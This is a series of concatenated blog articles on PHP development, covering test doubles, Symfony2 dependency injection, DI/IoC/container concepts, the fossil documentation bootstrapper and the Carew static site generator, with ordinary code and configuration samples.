You may not be able to write every possible tests, but still writing some tests will save you time in the future as it will prevent regression: the software industry is an industry of changing requirements, which means your code will eventually be changed, adapted and sometime completly re-written.
Tests will allow you to change the code lighthearted, because if your change breaks something, you'll know it simply by running your tests.
Chances are your system is composed of parts which interact with each other: your functions call other functions, your classes depend on other classes and use external functions, etc.
What if the part of the system you want to test interracts with a database, the filesystem and also use a randomizer? Yep that's right, a randomizer: how can you even write the expected output if it's supposed to be unpredictable?
The solution is quite simple: you should isolate the part you want to test. In order to do so, you should use test doubles which is the practice of replacing the dependencies of this part with objects which will behave the way you tell them to.
There's many kinds of test doubles, fortunately Martin Fowler has summed it up for you as follow:
Dummy objects are passed around but never actually used. Usually they are just used to fill parameter lists.
Fake objects actually have working implementations, but usually take some shortcut which makes them not suitable for production (an in memory database is a good example).
Stubs provide canned answers to calls made during the test, usually not responding at all to anything outside what's programmed in for the test. Stubs may also record information about calls, such as an email gateway stub that remembers the messages it 'sent', or maybe only how many messages it 'sent'.
Mocks are what we are talking about here: objects pre-programmed with expectations which form a specification of the calls they are expected to receive.
In practice you'll use stubs to specify the return value of the dependency, and you'll use mocks to check if the dependency's method has been called. The best way to create stubs and mocks is to write a class which inherits the targeted dependency, and overwrites its public methods.
Note: the part you want to test is called the System Under Test (SUT), and its dependencies are called collaborators.
Did you notice I've used the word dependency in this section? That's because in order to make a class testable, you need it to be as decoupled as possible from its dependencies.
You won't be able to easily replace dependencies which are created by the part you want to test. The simplest way is to inject them (pass them as arguments) to your class, allowing you to decide what should be injected: the real dependency, or one of its stub (or mock).
This is why Dependency Injection is a big deal. If you don't clearly know what is this design pattern about, I advise you to read this article.
Tests allow you to make sure parts of your system work as expected, and they can be automated so you can run them regurarly in order to detect any regressions.
There's a lot of layers which can be tested and you might have to choose what is best for you (the wrong answer being "no tests for me, thank you very much").
Dependency Injection is the right way to go, as it will allow you to use test doubles to isolate the part you want to check.
This article had much theory in it, so the next one will be more practical with code samples, case studies and tools which will allow you to test your applications: Tools overview.
I might not have stressed this out enough: tests won't magically prevent your system from failing. This is all because your test will only cover the part you targeted, for the use case you could think of at the time.
So, how to make sure your tests are enough? At first glance, test coverage might be a solution: it's a tool which will mark any line of code executed while the test is run and which will produce a report telling you which parts haven't been visited.
The biggest flaw of such a tool is that just because you called a line doesn't mean you tested it. The other important weakness is that not every code needs to be tested (for example getters of values which are not altered): the report will tell you a percentage of code covered, but it won't be able to tell you if the covered part is the essential one.
In order to know if your tests cover the critical parts, mutation testing have been invented: a tool will alter random parts of your code and run the tests. If your tests fail, then they play well their role of guarding your application against regressions.
However this is not very precise, they're slow and they can't know what are the critical parts of your system...
I guess the best you can do is TDD, which we'll see in a future article ;) .
If you're interested in this subject, I advise you to read Jason Gorman's article on code coverage.
]]>Deprecated: This article has been re-written - see The Ultimate Developer Guide to Symfony - Dependency Injection
In the previous article we've seen among other things the definition of Dependency Injection (DI) and of the Dependency Injection Container (DIC).
In this article we'll see the Symfony2's DI component which provides a powerful DIC. Here's the summary:
You don't use Symfony2? Don't worry, this article is all about using this component as a standalone library (you can use it in your CakePHP/Zend/Home-made-framework application).
DI is all about passing arguments to the constructor of an object. Because constructing all those object might become a burden, the DIC is here to take this responsibility and centralize it.
Let's replace Pimple by Symfony2 DI component in the code sample from the previous article:
<?php
use Symfony\Component\Console\Output\OutputInterface;
use Symfony\Component\DependencyInjection\ContainerBuilder;
$container = new ContainerBuilder();
// This is a parameter definition
$container->setParameter('verbosity_level_map', array(
OutputInterface::VERBOSITY_NORMAL => Logger::NOTICE,
OutputInterface::VERBOSITY_VERBOSE => Logger::INFO,
OutputInterface::VERBOSITY_VERY_VERBOSE => Logger::DEBUG,
OutputInterface::VERBOSITY_DEBUG => Logger::DEBUG,
);
// register takes the service name, and then its fully qualified classname as a string
$container->register(
'console_output',
'Symfony\Component\Console\Output\ConsoleOutput'
);
$container->register(
'output_formatter',
'Gnugat\Fossil\ApplicationLayer\OutputFormatter'
);
// You can inject:
// * dependencies which have been declared previously
// * arguments
// * parameters which have been declared previously
// * setter dependencies
$container
->register('console_handler', 'Symfony\Bridge\Monolog\Handler\ConsoleHandler')
->addArgument(new Reference('console_output'))
->addArgument(true)
->addArgument('%verbosity_level_map%')
->addMethodCall('setFormatter', array(new Reference('output_formatter')));
;
$container
->register('logger', 'Monolog\Logger')
->addArgument('default.logger')
->addMethodCall('pushHandler', array(new Reference('console_handler')));
;
$container->register('filesystem', 'Symfony\Component\Filesystem\Filesystem');
$container
->register('documentation_writer', 'Gnugat\Fossil\MarkdownFile\DocumentationWriter')
->addArgument(new Reference('filesystem'))
->addArgument(new Reference('logger'))
;
If you think about it, the construction of objects is a configuration thing: you need to define for each object their dependencies. Symfony2's DI component allows you to put all those definition inside a configuration file:
<?xml version="1.0" ?>
<!-- File: dic_config.xml -->
<container xmlns="http://symfony.com/schema/dic/services"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://symfony.com/schema/dic/services http://symfony.com/schema/dic/services/services-1.0.xsd">
<parameters>
<parameter key="verbosity_Level_map" type="collection">
<parameter key="Symfony\Component\Console\Output\OutputInterface::VERBOSITY_NORMAL">Monolog\Logger::NOTICE</parameter>
<parameter key="Symfony\Component\Console\Output\OutputInterface::VERBOSITY_VERBOSE">Monolog\Logger::INFO</parameter>
<parameter key="Symfony\Component\Console\Output\OutputInterface::VERBOSITY_VERY_VERBOSE">Monolog\Logger::DEBUG</parameter>
<parameter key="Symfony\Component\Console\Output\OutputInterface::VERBOSITY_DEBUG">Monolog\Logger::DEBUG</parameter>
</parameter>
</parameters>
<services>
<service id="console_output"
class="Symfony\Component\Console\Output\ConsoleOutput">
</service>
<service id="output_formatter"
class="Gnugat\Fossil\ApplicationLayer\OutputFormatter">
</service>
<service id="console_handler"
class="Symfony\Bridge\Monolog\Handler\ConsoleHandler">
<argument type="service" id="console.output" />
<argument key="bubble">true</argument>
<argument>%verbosity_Level_map%</argument>
<call method="setFormatter">
<argument type="service" id="output_formatter" />
</call>
</service>
<service id="logger" class="Monolog\Logger">
<argument>default.logger</argument>
<call method="pushHandler">
<argument type="service" id="console_handler" />
</call>
</service>
<service id="filesystem"
class="Symfony\Component\Filesystem\Filesystem">
</service>
<service id="documentation_writer"
class="Gnugat\Fossil\MarkdownFile\DocumentationWriter">
<argument type="service" id="filesystem" />
<argument type="service" id="logger" />
</service>
</services>
</container>
And here's the code sample allowing you to feed the DIC with this configuration:
<?php
// File: front_controller.php
use Symfony\Component\Config\FileLocator;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Loader\XmlFileLoader;
$container = new ContainerBuilder();
$configurationDirectory = new FileLocator(__DIR__);
$loader = new XmlFileLoader($container, $configurationDirectory);
$loader->load('dic_config.xml');
$documentationWriter = $container->get('documentation_writer');
$documentationWriter->write('/tmp/example.txt', 'Hello world');
The construction of our objects has been completely removed from the code and has been put into a configuration file. Actually, we've replaced object constructions by container initialization, which is way more concise.
The Symfony2's DI component allows many configuration formats:
I wouldn't advise you to use YAML format, as it needs to introduce special formating in order to support advanced options like:
@@?@ with @ in order to escape them@=Not to mention the fact that it doesn't support every options (for instance you cannot declare constants as parameters)
On the other hand, the only thing XML doesn't support is concatenation:
<?php
use Symfony\Component\DependencyInjection\ContainerBuilder;
$container = new ContainerBuilder();
// Needs to be done in plain PHP
$container->setParameter('skeletons_path', __DIR__.'/skeletons');
XML can be easily validated and it also can be read by many software like IDE's which can use it in order to provide you with blissful autocompletion.
If you're concerned about performances (reading XML might be slower than requiring directly plain PHP), Symfony2's DI component allows you to convert it into plain PHP and dump it into a cache file which you can then include in your application: take a look at the documentation.
There's a fantastic conclusion we can deduce from the above section: we can reduce the lines of codes of our projects simply by extracting object construction and putting it into configuration files.
Object construction is part of the "wiring layer" of your application: it doesn't solve your "business problem", nor does it solve your "application problem". It simply is the boilerplate code necessary to write those.
Let's explore the impact of wiring your application using Symfony2's DI component. You might not have noticed it, but the code samples used in the previous article as well as in this one all come from fossil, a command which allows you to bootstrap markdown files of your projects (cf this article). It uses Symfony2's Console component which requires some boilerplate code in order to create the application:
<?php
// This is the front controller of the application
// File: fossil
use Gnugat\Fossil\DocCommand;
use Symfony\Component\Config\FileLocator;
use Symfony\Component\Console\Application;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Loader\XmlFileLoader;
$container = new ContainerBuilder();
$configurationDirectory = new FileLocator(__DIR__);
$loader = new XmlFileLoader($container, $configurationDirectory);
$loader->load('dic_config.xml');
$documentationWriter = $container->get('documentation_writer');
$docCommand = new DocCommand($documentationWriter);
$application = new Application('Fossil', '2.0.0');
$application->add($docCommand);
$output = $container->get('console_output');
$application->run(null, $output);
Can you imagine what this front controller can become if we were to add more commands? You'd rather not? Me neither, that's why I advise you to put all this boilerplate code into a configuration file:
<?xml version="1.0" ?>
<!-- File: dic_config.xml -->
<container xmlns="http://symfony.com/schema/dic/services"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://symfony.com/schema/dic/services http://symfony.com/schema/dic/services/services-1.0.xsd">
<services>
<service id="console_output"
class="Symfony\Component\Console\Output\ConsoleOutput">
</service>
<service id="output_formatter"
class="Gnugat\Fossil\ApplicationLayer\OutputFormatter"
</service>
<service id="console_handler"
class="Symfony\Bridge\Monolog\Handler\ConsoleHandler"
<argument type="service" id="console.output" />
<argument key="bubble">true</argument>
<argument>%verbosity_Level_map%</argument>
<call method="setFormatter">
<argument type="service" id="output_formatter" />
</call>
</service>
<service id="logger" class="Monolog\Logger">
<argument>default.logger</argument>
<call method="pushHandler">
<argument type="service" id="console_handler" />
</call>
</service>
<service id="filesystem"
class="Symfony\Component\Filesystem\Filesystem"
</service>
<service id="documentation_writer"
class="Gnugat\Fossil\MarkdownFile\DocumentationWriter"
<argument type="service" id="filesystem" />
<argument type="service" id="logger" />
</service>
<service id="doc_command" class="Gnugat\Fossil\DocCommand">
<argument type="service" id="documentation_writer" />
</service>
<service id="application"
class="Symfony\Component\Console\Application">
<argument key="name">Fossil</argument>
<argument key="version">2.0.0</argument>
<call method="add">
<argument type="service" id="doc_command" />
</call>
</service>
</services>
</container>
Which allows us to reduce our front controller:
<?php
// This is the front controller of the application
// File: fossil
use Symfony\Component\Config\FileLocator;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Loader\XmlFileLoader;
$container = new ContainerBuilder();
$configurationDirectory = new FileLocator(__DIR__);
$loader = new XmlFileLoader($container, $configurationDirectory);
$loader->load('dic_config.xml');
$application = $container->get('application');
$output = $container->get('console_output');
$application->run(null, $output);
Now our concern is the size of the dic_config.xml file which will keep growing
each time we create new services. Don't panic! You can split it into many files
using the imports tag:
<?xml version="1.0" ?>
<!-- File: config/dic.xml -->
<container xmlns="http://symfony.com/schema/dic/services"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://symfony.com/schema/dic/services http://symfony.com/schema/dic/services/services-1.0.xsd">
<imports>
<import resource="01-application.xml" />
<import resource="02-documentation_writer.xml" />
</imports>
</container>
We created a config directory to put all those XML files, which means we
should change our front controller to:
<?php
// This is the front controller of the application
// File: fossil
use Symfony\Component\Config\FileLocator;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Loader\XmlFileLoader;
$container = new ContainerBuilder();
$configurationDirectory = new FileLocator(__DIR__.'/config');
$loader = new XmlFileLoader($container, $configurationDirectory);
$loader->load('dic.xml');
$application = $container->get('application');
$output = $container->get('console_output');
$application->run(null, $output);
The creation of the config/01-application.xml and
config/02-documentation_writer.xml files is left as an exercise for the
reader.
The Symfony2's Dependency Injection component can be used outside of a Symfony2 application. It provides a powerful DIC which can be initialized using configuration files. This means that boilerplate code (also called "wiring layer") can be removed from your code and put in configuration files, hooray!
I hope you enjoyed this article, be sure to tweet me what you think about it ;) .
We've used the component as a standalone library, but everything we've done here is possible inside a Symfony2 fullstack application.
There's also some tips I'd like to share with you:
The construction of Doctrine repositories is fully handled by the EntityManager, which means:
The previous article spoke about service locator, which is all about using DIC as a dependency. If you still don't see what it means, take a look at Symfony2 ContainerAware classes.
For example, a Symfony2 controller uses the DIC as a Service Locator. In this specific case it might be justified, as the controller shouldn't contain any logic: its purpose is to pass the request's parameters to some services, and to feed their return values as the response's parameters.
Keep in mind that in your own code, there's a 99.99% chance that using Service Locator is a unjustified decision ;) .
]]>If you've never heard of those (or one of those), this article will teach you what they are.
If you know what are those, but don't know what's the difference between them, this article will teach you what it is.
If you know what are those and what's the difference between them... Well read this article and tell me what you think about it on Twitter ;) .
Those big names actually refer to simple design patterns and principles which might help you in your projects. Maybe you've been using them without knowing it!
This principle is very abstract, as it is based on the way you use objects rather than specifying how to write them.
To keep things short: IoC (Inversion of Control) is all about relationship between higher level classes and detail classes. Higher level classes shouldn't depend on detail classes, but rather the contrary.
In order to ensure this, higher level classes should depend on abstractions (like interfaces) instead of depending on concrete classes. Also, you should make sure that higher level classes own detail classes.
While I understand this principle, I cannot make a better explanation than this which is really a shame. But I know a good article which can: Dependency Injection is NOT the same as the Dependency Inversion Principle, by Derick Bailey.
I really encourage you to read it as it explains very well the problem IoC tries to solve, with some good (and graphical) examples.
Let's explain each words:
Some people instanciate those dependencies inside the class which use them, for example:
<?php
namespace Gnugat\Fossil\MarkdownFile;
use Symfony\Component\Filesystem\Filesystem;
class DocumentationWriter
{
public function write($absolutePathname, $content)
{
$filesystem = new Filesystem();
if (!$filesystem->exists($absolutePathname)) {
$filesystem->dumpFile($absolutePathname, $content);
}
}
}
$documentationWriter = new DocumentationWriter();
$documentationWriter->write('/tmp/example.txt', 'Hello world');
There's nothing wrong with this code, but it could be improved.
First of all, it happens that Filesystem is "stateless": you can call every
methods it has, in the order you want, it won't change the way it behaves. Which
means you could create a single instance for your whole application: it would
save some precious memory.
Second of all, this class cannot be tested: if anything, you would be testing
Filesystem itself by checking if the file was written with the same name and
content.
DI (Dependency Injection) is used to solve these two problems: you should first
create the instance of Filesystem and then pass it to (inject it into)
DocumentationWriter:
<?php
namespace Gnugat\Fossil\MarkdownFile;
use Symfony\Component\Filesystem\Filesystem;
class DocumentationWriter
{
public function write(Filesystem $filesystem, $absolutePathname, $content)
{
if (!$filesystem->exists($absolutePathname)) {
$filesystem->dumpFile($absolutePathname, $content);
}
}
}
$filesystem = new Filesystem();
$documentationWriter = new DocumentationWriter();
$documentationWriter->write($filesystem, '/tmp/example.txt', 'Hello world');
The dependency can now be shared throughout your application, and you can pass a mock of it which will be able to tell you which method was called.
Injection is usually done via the constructor:
<?php
namespace Gnugat\Fossil\MarkdownFile;
use Symfony\Component\Filesystem\Filesystem;
class DocumentationWriter
{
private $filesystem;
public function __construct(Filesystem $filesystem)
{
$this->filesystem = $filesystem;
}
public function write($absolutePathname, $content)
{
if (!$this->filesystem->exists($absolutePathname)) {
$this->filesystem->dumpFile($absolutePathname, $content);
}
}
}
$filesystem = new Filesystem();
$documentationWriter = new DocumentationWriter($filesystem);
$documentationWriter->write('/tmp/example.txt', 'Hello world');
Time to time, injection will be done via setters:
<?php
namespace Gnugat\Fossil\MarkdownFile;
use Symfony\Component\Filesystem\Filesystem;
class DocumentationWriter
{
private $filesystem;
public function setFilesystem(Filesystem $filesystem)
{
$this->filesystem = $filesystem;
}
public function write($absolutePathname, $content)
{
if (!$this->filesystem->exists($absolutePathname)) {
$this->filesystem->dumpFile($absolutePathname, $content);
}
}
}
$filesystem = new Filesystem();
$documentationWriter = new DocumentationWriter();
$documentationWriter->setFilesystem($filesystem);
$documentationWriter->write('/tmp/example.txt', 'Hello world');
Setter injection is used when you have no control on the object construction, and can be dangerous: if the setter isn't called, a runtime error will occur.
To help debug this kind of error, you can do this:
<?php
namespace Gnugat\Fossil\MarkdownFile;
use Symfony\Component\Filesystem\Filesystem;
class DocumentationWriter
{
private $filesystem;
public function setFilesystem(Filesystem $filesystem)
{
$this->filesystem = $filesystem;
}
public function write($absolutePathname, $content)
{
if (!$this->getFilesystem()->exists($absolutePathname)) {
$this->getFilesystem()->dumpFile($absolutePathname, $content);
}
}
private function getFilesystem()
{
if (!($this->filesystem instanceof Filesystem)) {
$msg = 'The Filesystem dependency is missing.';
$msg .= ' Did you forgot to call setFilesystem?';
throw new \LogicException($msg);
}
return $this->filesystem;
}
}
$documentationWriter = new DocumentationWriter();
// Will throw an exception with a helpful message.
$documentationWriter->write('/tmp/example.txt', 'Hello world');
You shouldn't need to use setter injection in your own class, but rather on classes which extend third party library.
For example Doctrine's repositories can only be retrieved using its
EntityManager, which mean you don't have the control on its construction. If
you need to pass dependencies to it, you'll have to use setter injection.
The subject of the article previously quoted is the relation between DI and IoC: some people confuse them and think they're the same by simply deducing that IoC is injecting interfaces instead of concrete classes.
While combining them is possible, you should remember that IoC is first a matter of higher level classes owning their detail classes. The principle (IoC) and the design pattern (DI) are really different things.
The flaw of DI is the manual construction of all those objects: some classes might have dependencies which themselves have dependencies. And even without deep dependencies, manually creating a large number of classes is never pleasant.
The biggest risk is to scatter object construction in the whole application and losing track of it: if you don't know that an object has already been constructing you might accidently construct it again.
Let's add a dependency on Monolog to our
DocumentationWriter (plus some custom configuration to spice it up):
<?php
use Gnugat\Fossil\ApplicationLayer\OutputFormatter;
use Gnugat\Fossil\MarkdownFile\DocumentationWriter;
use Monolog\Logger;
use Symfony\Bridge\Monolog\Handler\ConsoleHandler;
use Symfony\Component\Console\Output\ConsoleOutput;
use Symfony\Component\Console\Output\OutputInterface;
use Symfony\Component\Filesystem\Filesystem;
$verbosityLevelMap = array(
'OutputInterface::VERBOSITY_NORMAL' => Logger::NOTICE,
'OutputInterface::VERBOSITY_VERBOSE' => Logger::INFO,
'OutputInterface::VERBOSITY_VERY_VERBOSE' => Logger::DEBUG,
'OutputInterface::VERBOSITY_DEBUG' => Logger::DEBUG,
);
$consoleOutput = new ConsoleOutput();
$outputFormatter = new OutputFormatter();
$consoleHandler = new ConsoleHandler(
$consoleOutput,
true,
$verbosityLevelMap
);
$consoleHandler->setFormatter($outputFormatter);
$logger = new Logger('default.logger');
$logger->pushHandler($consoleHandler);
$filesystem = new Filesystem();
$documentationWritter = new DocumentationWriter(
$filesystem,
$logger
);
$documentationWriter->write('/tmp/example.txt', 'Hello world');
It's quite a burden isn't it?
The DIC (Dependency Injection Container) solves this problem by taking the responsibility of creating them for you. technically, you still write all of these lines, but instead of putting them mixed with business logic code you put it in a separate file.
DIC can be found in many languages:
To better understand what is a DIC, we'll take a look at Pimple, a small DIC for PHP using a javascript-like syntax.
Pimple can be considered as an array in which you can put parameters and "factories": an anonymous function which creates an instance of the class.
Here's the code sample:
<?php
// File: dic.php
use Gnugat\Fossil\ApplicationLayer\OutputFormatter;
use Gnugat\Fossil\MarkdownFile\DocumentationWriter;
use Monolog\Logger;
use Symfony\Bridge\Monolog\Handler\ConsoleHandler;
use Symfony\Component\Console\Output\ConsoleOutput;
use Symfony\Component\Console\Output\OutputInterface;
use Symfony\Component\Filesystem\Filesystem;
$dic = new Pimple();
// This is a parameter definition
$dic['verbosity_level_map'] = array(
'OutputInterface::VERBOSITY_NORMAL' => Logger::NOTICE,
'OutputInterface::VERBOSITY_VERBOSE' => Logger::INFO,
'OutputInterface::VERBOSITY_VERY_VERBOSE' => Logger::DEBUG,
'OutputInterface::VERBOSITY_DEBUG' => Logger::DEBUG,
);
// Thess are a factory definition
$dic['console_output'] = $dic->share(function($dic) {
return new ConsoleOutput();
});
$dic['output_formatter'] = $dic->share(function($dic) {
return new OutputFormatter();
});
// You can inject dependencies which have been declared previously
$dic['console_handler'] = $dic->share(function($dic) {
$consoleHandler = new ConsoleHandler(
$dic['console_output'],
true,
$dic['verbosity_level_map']
);
$consoleHandler->setFormatter($dic['output_formatter']);
return $consoleHandler
});
$dic['logger'] = $dic->share(function($dic) {
$logger = new Logger('default.logger');
$logger->pushHandler($dic['console_handler']);
return $logger
});
$dic['filesystem'] = $dic->share(function($dic) {
return new Filesystem();
});
$dic['documentation_writer'] = $dic->share(function($dic) {
return new DocumentationWriter(
$dic['filesystem'],
$dic['logger']
);
});
So, what's the big difference between this and the previous code sample? Well
now you centralized all your instances into a single container, the definition
of your object is done in a central place (you can move it into a file
dic.php for example) and the best of all: classes will be instanciated lazily,
which means as long as you don't aks for them they won't be created, and once
you created them they won't be created a second time.
In your application, you just need to pass the DIC and use it:
<?php
// File: front_controller.php
require_once __DIR__.'/dic.php';
// Now you can retrieve instances from the DIC
$documentationWriter = $dic['documentation_writer'];
$documentationWriter->write('/tmp/example.txt', 'Hello world');
I must stress on the fact that object creation is now centralized: the code from the first example (the one without DIC) could be scattered into different places of your application.
Again, people often mixep up those two for the same reason they mix up DI and IoC. There's a lot of DIC libraries which have been falsely called ioc.
Please, don't make the same mistake.
Singleton is a design pattern saying that a given object should only be instanciated once and that it should be guarded from being instanciated a second time.
Here's an implementation example of a singleton:
<?php
// Code from https://github.com/domnikl/DesignPatternsPHP/blob/master/Singleton/Singleton.php
class Singleton
{
protected static $instance;
public static function getInstance()
{
if (null === static::$instance) {
static::$instance = new static;
}
return static::$instance;
}
private function __construct()
{
// is not allowed to call from outside: private!
}
}
While in our example the DIC makes sure our objects are constructed only once, we can't call them singletons as nobody prevents you from creating them a second time manually.
Keep in mind that DIC aren't always making sure of this: in our example we've used the special share method of Pimple to ensure it, but you can also retrieve a new instance on every call:
<?php
use Symfony\Component\Finder\Finder;
$dic['finder'] = function($dic) {
return new Finder();
});
$firstFinder = $dic['finder'];
$secondFinder = $dic['finder'];
To recap: DI and DIC have nothing to do with Singleton.
The classes you put into the DIC can be called Services: they will execute
a task for you when you call them.
A Service Locator isn't just a container of services which gets them when you ask it to: what we described is simply a DIC. To be a Service Locator, a DIC must be injected as a dependency.
This might happen with classes which have many dependencies: instead of injecting them one by one you can inject directly the DIC and let the class retrieve the services it needs.
You should be warned that this is generally a bad idea: a class which requires too many dependencies should be splitted into several smaller classes.
There is however some cases when Service Locator are usefull, for example controllers are good candidates as their only responsibility is to pass input to services and to return output.
To be more precise, Service Locator shouldn't be used in your business logic, but rather in objects which serve as intermediate between two layers.
Here's a good article about when to use Service Locators by Ralph Schindler.
Here's the TL;DR:
If this article didn't teach you anything and made you angry, please tweet it to me. If you learned some things, or if this article made your day, feel free to do the same ;) .
If you want to read more about DI and DIC, here's good series by Fabien Potencier's series on what is Dependency Injection.
There's also William Durand's slides on Writing Better Code (actually the slides are about PHP and contain good resources. I encourage you to read it entirely!).
]]>Deprecated: Fossil is currently unmaintained.
The one thing that will make developers use your Free or Open Source Software (FOSS) project is its documentation. Without it, how can they know what it does, or how to install it?
Last summer William Durand wrote an article about it, describing the minimum files your FOSS project should have, and what they should contain.
After reading his article, maybe you did the same thing as me: you took your courage with both hands and wrote thoroughly a decent documentation for the project you were working on at the time.
Because it was tedious, you decided to copy those markdown files into your new projects and adapt them.
But this too was tedious...
To solve this problem once for all I created fossil: it will bootstrap the markdown files of your FOSS projects, and it will even create an installer for you!
It generates the following files out of skeletons:
CHANGELOG.mdCONTRIBUTING.mdLICENSEREADME.mdVERSIONING.mdbin/installer.shdoc (or Resources/doc if the project is a bundle) directory:
01-introduction.md02-installation.md03-usage.md04-tests.mdThe best thing about it: you can run it on your new FOSS projects as well as
with your existing ones! By default it does not replace existing files (if you
want to, simply use the -f option).
Fossil supports different kind of projects: applications, libraries and Symfony2 bundles. Here's a quick usage guide.
The doc command allows you to generate the markdown files of your
applications, which can be a web application or a CLI tool just like fossil.
As you can see in the following example, it only requires 2 arguments:
fossil doc 'acme/application' 'The ACME company'
Applications are installed by cloning the github repository, which makes it as
easy to update as to run git pull.
This argument is used in the installer script as well as in the installation instructions.
You don't need to write the whole github URL, simply give the username and the
project name in the following format: username/project-name
While the copyright's date can be computed, you need to provide the author's
name to generate the LICENSE file.
For now it only generates MIT licenses, but pull requests are welcomed :) .
By default the files are created in the current directory, but you can target a specific path:
fossil doc 'acme/application' 'The ACME company' -p '/tmp/application'
As mentioned earlier, fossil won't replace existing files by default: for
instance if your project already has a README.md and a LICENSE file it will
only generate the other ones.
But if you want to throw them away, you can use this option:
fossil doc 'acme/project' 'The ACME company' -f
The doc:library command has the exact same arguments and options as the doc
one:
fossil doc:library 'acme/library' 'The ACME company'
You can use the shortcut d:l:
fossil d:l 'acme/library' 'The ACME company'
The difference between an application and a library lies in its installation: the library is installed using composer.
By default fossil assumes the composer package's name is the same as the
Github repository name (in the example it would be acme/library).
If it's not your case, use the following option:
fossil d:l 'acme/library' 'The ACME company' -c 'acme/composer-package'
The doc:bundle command has almost the same arguments and options as the
doc:library one. It has an additional argument:
fossil doc:bundle 'acme/demo-bundle' 'The ACME company' 'Acme\DemoBundle\AcmeDemoBundle'
You can use the shortcut d:b:
fossil d:b 'acme/demo-bundle' 'The ACME company' 'Acme\DemoBundle\AcmeDemoBundle'
The difference between a library and a bundle is the documentation directory,
which is in Resources/doc instead of doc.
Another difference is the installation: the bundle needs to be added in the application's kernel.
This will be detailed in the documentation, but it will also be taken care of by the installer.
That's right, you read it right: when developers will run the installer, not
only will it download the bundle using composer, but it will also add its fully
qualified classname in the app/AppKernel.php file! Hooray!
The application's kernel will look like this afterwards:
<?php
// File: app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
class AppKernel extends Kernel
{
public function registerBundles()
{
$bundles = array(
// Other bundles...
new Acme\DemoBundle\AcmeDemoBundle(),
);
if (in_array($this->getEnvironment(), array('dev', 'test'))) {
// Other bundles...
}
return $bundles;
}
}
Note: because of the backslashes you should escape this argument using quotes, just like in the example.
By using this option, the bundle will be registered in the application only if it runs in development or test environment:
fossil d:b 'acme/demo-bundle' 'The ACME company' 'Acme\DemoBundle\AcmeDemoBundle' -d
The application's kernel will look like this afterwards:
<?php
// File: app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
class AppKernel extends Kernel
{
public function registerBundles()
{
$bundles = array(
// Other bundles...
);
if (in_array($this->getEnvironment(), array('dev', 'test'))) {
// Other bundles...
$bundles[] = new Acme\DemoBundle\AcmeDemoBundle();
}
return $bundles;
}
}
After running fossil you still need to provide some information (for
instance the elevator pitch in README.md) by editing those files:
README.mddoc/01-introduction.mddoc/03-usage.mddoc/04-tests.mdBut is that enough? While I think fossil automates as much things as possible, there's still some part of your project that needs specific documentation.
For example you could add recipes which describe common tasks, or a glossary defining technical or business terms used in your project.
Bootstrap the markdown files of your new and your old FOSS projects using fossil, and then complete the documentation so everyone can see how awesome your work is!
Happy hacking!
]]>Deprecated: This article has been re-written - see Read it Later
As a curious person I'm constantly trying to learn new practices and to discover tools which might help me, by collecting information via technology scouting and then reading it.
In this article, I will present how to do so effectively.
Whenever you find an interesting link, send it to Pocket so you can read it later.
To find interesting links subscribe to blog RSS feeds using If This Then That: it will send new entries directly to pocket.
Here are some blogs I personnally follow (caution, they're not really sorted):
You can also use Twitter:
The lists only show messages (not retweets) and conversations between people you follow. They also allow you to create categories.
If you want, you can have a look at my own public lists.
Last but not least, Github can also be a great source of discoveries: by following someone which stars or watch a lot of projects you will have them listed on your homepage.
Here's my advice: Pascal Borreli contributes to many repositories, you should start to follow him.
Collecting resources is a thing, getting it read is another one. Just like Mathias Verraes advised it, you should get an e-reader: you can send the pages you gathered on Pocket and then read them everywhere.
Pocket allows you to remove the articles you found not so interresting after all, it also allows you to archive the good ones and to favorite the great ones.
Speaking of reading and e-readers, books are another good way of discovering new things. Do not underestimate them. Here's a list of books I'd recommend:
The point is: current tools won't last and there's a lot of practices you're not aware of. If you want to improve yourself and keep up with other developers, you have to try your best to discover new practices (which might be rather old actually) and new trending tools.
I hope you found this article enjoyable and helpful.
]]>Deprecated: This article has been re-written - see Scuplin
Frameworks are a real help when building web applications which serve business logic. But what about static websites?
Those only contain pages which could be directly written in HTML. The only problem with this approach is that HTML isn't writter friendly compared to Markdown.
Also, we could say that static websites like blogs do have some logic behind the scenes:
But still, a framework might be too much for this task.
Static site generators are a way to solve this problem:
Carew is one of them (among Jekyll, Hyde, Poole and Lanyon): it is written in PHP, allows you to use the template engine Twig in your markdown and it provides a theme using Bootstrap.
This blog post will focus on Carew, as this very blog is written with it.
A common way to quickly publish static sites is to use Github Pages which works as follow:
<username>.github.ioweb directory directly at the
root of your repohttp://<username>.github.ioLearn more about hosting a website built with Carew on the official website.
Creating your site using Carew is very simple, just follow these steps:
$ php composer.phar create-project carew/boilerplate <project> -s dev
$ cd <project>
$ bin/carew build
Examples pages (which sources are located in pages and posts) are converted
from markdown to HTML in the web directory.
Before writing any page or post, edit the configuration wich is located inside
the config.yml file.
Then edit the pages/index.md and pages/about.md pages with your own content.
Finally, remove the content of the posts folder and create your first blog
post using this command:
$ bin/carew generate:post [--date='YYYY-MM-DD'] title
See the configuration documentation on the official website.
Each markdown file starts with a header:
---
layout: post # no need for this line when writing a regular page
title: Will be used by `<title></title>` and `<h1></h1>`
tags:
- first tag
- carew
---
Carew generates a page listing all existing tags. You can create a link to this page with the following snippet:
{{ link('tags', 'The page with all the tags') }}.
Learn more about Front matters on the official website.
Carew is really simple to use, in this article we've covered the minimum you should know to create pages, blog posts and tags.
I hope you enjoyed this article and that it helped you a little.
If you want to learn more, for example to customize its behaviour or its theme, please refer to the official documentation.
]]>